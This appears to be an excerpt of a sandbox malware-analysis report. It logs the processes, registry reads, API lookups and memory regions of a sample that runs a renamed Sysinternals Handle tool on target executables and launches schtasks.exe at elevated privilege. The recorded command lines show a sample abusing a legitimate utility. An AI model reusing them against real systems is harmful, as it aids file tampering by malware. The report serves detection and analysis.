| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\schtasks.exe | os_pid = 0xc7c, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000000 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #141: vidhs3md64.exe
67
0
| Information | Value |
|---|---|
| ID | #141 |
| File Name | c:\users\ciihmn~1\appdata\local\temp\vidhs3md64.exe |
| Command Line | vIDhS3md.exe -accepteula -c Run -y -p extract -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:55, Reason: Child Process |
| Unmonitor | End Time: 00:04:57, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc30 |
| Parent PID | 0xd14 (c:\users\ciihmnxmn6ps\desktop\vidhs3md.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C34
0x
C40
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00026fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00043fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x0014ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000150000 | 0x00150000 | 0x00153fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000160000 | 0x00160000 | 0x00160fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000170000 | 0x00170000 | 0x00171fff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00180000 | 0x001b3fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00196fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001a0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002c0000 | 0x0037dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000380000 | 0x00380000 | 0x0047ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000480000 | 0x00480000 | 0x00607fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x00790fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000007a0000 | 0x007a0000 | 0x01b9ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ba0000 | 0x01ba0000 | 0x01c2ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f5da000 | 0x7f5da000 | 0x7f5dafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| vidhs3md64.exe | 0x140000000 | 0x140045fff | Memory Mapped File | rwx |
|
|
|
|
| pagefile_0x00007ff5ffed0000 | 0x7ff5ffed0000 | 0x7ff5fffcffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00007ff5fffd0000 | 0x7ff5fffd0000 | 0x7ff5ffff2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00007ff5ffff5000 | 0x7ff5ffff5000 | 0x7ff5ffff5fff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffb000 | 0x7ff5ffffb000 | 0x7ff5ffffcfff | Private Memory | rw |
|
|
|
- |
| private_0x00007ff5ffffd000 | 0x7ff5ffffd000 | 0x7ff5ffffefff | Private Memory | rw |
|
|
|
- |
| comctl32.dll | 0x7ffae5c40000 | 0x7ffae5ce9fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7ffaeb6f0000 | 0x7ffaeb6f9fff | Memory Mapped File | rwx |
|
|
|
- |
| powrprof.dll | 0x7ffaf4440000 | 0x7ffaf4489fff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7ffaf4490000 | 0x7ffaf44a2fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel.appcore.dll | 0x7ffaf44d0000 | 0x7ffaf44defff | Memory Mapped File | rwx |
|
|
|
- |
| windows.storage.dll | 0x7ffaf4590000 | 0x7ffaf4bb7fff | Memory Mapped File | rwx |
|
|
|
- |
| shcore.dll | 0x7ffaf4bc0000 | 0x7ffaf4c72fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7ffaf4e50000 | 0x7ffaf502cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x7ffaf5140000 | 0x7ffaf528dfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7ffaf5290000 | 0x7ffaf53b5fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7ffaf53c0000 | 0x7ffaf53f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7ffaf5700000 | 0x7ffaf579cfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7ffaf57a0000 | 0x7ffaf57fafff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7ffaf5800000 | 0x7ffaf5984fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7ffaf5990000 | 0x7ffaf6eb4fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7ffaf6f70000 | 0x7ffaf70cbfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x7ffaf70d0000 | 0x7ffaf717cfff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x7ffaf72e0000 | 0x7ffaf755bfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7ffaf75d0000 | 0x7ffaf7675fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7ffaf7860000 | 0x7ffaf78b0fff | Memory Mapped File | rwx |
|
|
|
- |
| comdlg32.dll | 0x7ffaf7930000 | 0x7ffaf7a07fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
Host Behavior
File (18)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | STD_INPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
1 | |
| Get Info | STD_ERROR_HANDLE | type = file_type |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 101 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 44 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 58 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 138 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 85 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 59 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 56 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 69 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 74 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 78 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 72 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 49 |
|
1 |
Registry (7)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Sysinternals\Handle | - |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals | value_name = EulaAccepted, data = 0 |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1 |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Sysinternals\Handle | value_name = EulaAccepted, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (38)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x7ffaf70d0000 |
|
2 | |
| Get Handle | mscoree.dll | - |
|
1 | |
| Get Filename | - | process_name = c:\users\ciihmn~1\appdata\local\temp\vidhs3md64.exe, file_name_orig = C:\Users\CIIHMN~1\AppData\Local\Temp\vIDhS3md64.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | address_out = 0x7ffaf70f02a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x7ffaf70f23f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x7ffaf70e63c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x7ffaf70ed920 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = InitializeCriticalSectionEx, address_out = 0x7ffaf70f5620 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventExW, address_out = 0x7ffaf70f5580 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSemaphoreExW, address_out = 0x7ffaf70f55e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadStackGuarantee, address_out = 0x7ffaf70f0e10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolTimer, address_out = 0x7ffaf70ef110 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolTimer, address_out = 0x7ffaf7a4cb10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForThreadpoolTimerCallbacks, address_out = 0x7ffaf7a55790 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolTimer, address_out = 0x7ffaf7a4ea10 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateThreadpoolWait, address_out = 0x7ffaf70f28c0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetThreadpoolWait, address_out = 0x7ffaf7a4c470 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseThreadpoolWait, address_out = 0x7ffaf7a55410 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlushProcessWriteBuffers, address_out = 0x7ffaf7aa42f0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeLibraryWhenCallbackReturns, address_out = 0x7ffaf7a895e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessorNumber, address_out = 0x7ffaf7aa3130 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLogicalProcessorInformation, address_out = 0x7ffaf70f0fb0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateSymbolicLinkW, address_out = 0x7ffaf7112720 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetDefaultDllDirectories, address_out = 0x7ffaf4f0e7a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EnumSystemLocalesEx, address_out = 0x7ffaf71128e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CompareStringEx, address_out = 0x7ffaf70e6010 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetDateFormatEx, address_out = 0x7ffaf7112a00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocaleInfoEx, address_out = 0x7ffaf70f0310 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTimeFormatEx, address_out = 0x7ffaf7112bc0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetUserDefaultLocaleName, address_out = 0x7ffaf70f25d0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsValidLocaleName, address_out = 0x7ffaf7112cd0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LCMapStringEx, address_out = 0x7ffaf70e6000 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentPackageId, address_out = 0x7ffaf4ea45e0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTickCount64, address_out = 0x7ffaf70e65a0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileInformationByHandleExW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileInformationByHandleW, address_out = 0x0 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsWow64Process, address_out = 0x7ffaf70ee960 |
|
1 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 |
Process #142: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #142 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c vIDhS3md.exe -accepteula "Journal.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:56, Reason: Child Process |
| Unmonitor | End Time: 00:05:00, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc44 |
| Parent PID | 0xeac (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C48
0x
C90
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000003c0000 | 0x003c0000 | 0x003dffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003d3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x003e3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x00403fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000410000 | 0x00410000 | 0x0044ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0054ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x00553fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000560000 | 0x00560000 | 0x00560fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x00571fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000580000 | 0x00580000 | 0x0058ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000590000 | 0x00590000 | 0x005cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x006cffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x006d0000 | 0x0078dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x0088ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x0099ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x009a0000 | 0x00cd6fff | Memory Mapped File | r |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x73030000 | 0x73037fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x73040000 | 0x7308efff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x73090000 | 0x73102fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x74d30000 | 0x74ea5fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x75130000 | 0x7521ffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x778d0000 | 0x7798dfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77990000 | 0x77b08fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e800000 | 0x7e800000 | 0x7e8fffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e900000 | 0x7e900000 | 0x7e922fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e926000 | 0x7e926000 | 0x7e928fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e929000 | 0x7e929000 | 0x7e929fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e92a000 | 0x7e92a000 | 0x7e92afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e92d000 | 0x7e92d000 | 0x7e92ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfaf7a0ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfaf7a10000 | 0x7dfaf7a10000 | 0x7ffaf7a0ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffaf7a10000 | 0x7ffaf7bd1fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffaf7bd2000 | 0x7ffaf7bd2000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | vIDhS3md.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 88, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\vIDhS3md.exe | os_pid = 0xcbc, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x13d0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x75130000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x75172780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x7514fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x7514a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x74e435c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #143: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #143 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c vIDhS3md.exe -accepteula "expenditurevincenttablet.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:04:56, Reason: Child Process |
| Unmonitor | End Time: 00:05:00, Reason: Self Terminated |
| Monitor Duration | 00:00:04 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc54 |
| Parent PID | 0xf4c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C58
0x
C8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000dc0000 | 0x00dc0000 | 0x00ddffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000dc0000 | 0x00dc0000 | 0x00dcffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000dd0000 | 0x00dd0000 | 0x00dd3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00de1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000de0000 | 0x00de0000 | 0x00de3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000df0000 | 0x00df0000 | 0x00e03fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000e10000 | 0x00e10000 | 0x00e4ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000e50000 | 0x00e50000 | 0x00f4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000f50000 | 0x00f50000 | 0x00f53fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000f60000 | 0x00f60000 | 0x00f60fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000f70000 | 0x00f70000 | 0x00f71fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00f80000 | 0x0103dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001040000 | 0x01040000 | 0x0107ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001080000 | 0x01080000 | 0x0108ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001090000 | 0x01090000 | 0x0129ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001090000 | 0x01090000 | 0x0118ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011a0000 | 0x011a0000 | 0x0129ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000012a0000 | 0x012a0000 | 0x012dffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x013d0000 | 0x0141ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001420000 | 0x01420000 | 0x0541ffff | Pagefile Backed Memory | - |
|
|
|
- |
| sortdefault.nls | 0x05420000 | 0x05756fff | Memory Mapped File | r |
|
|
|
- |
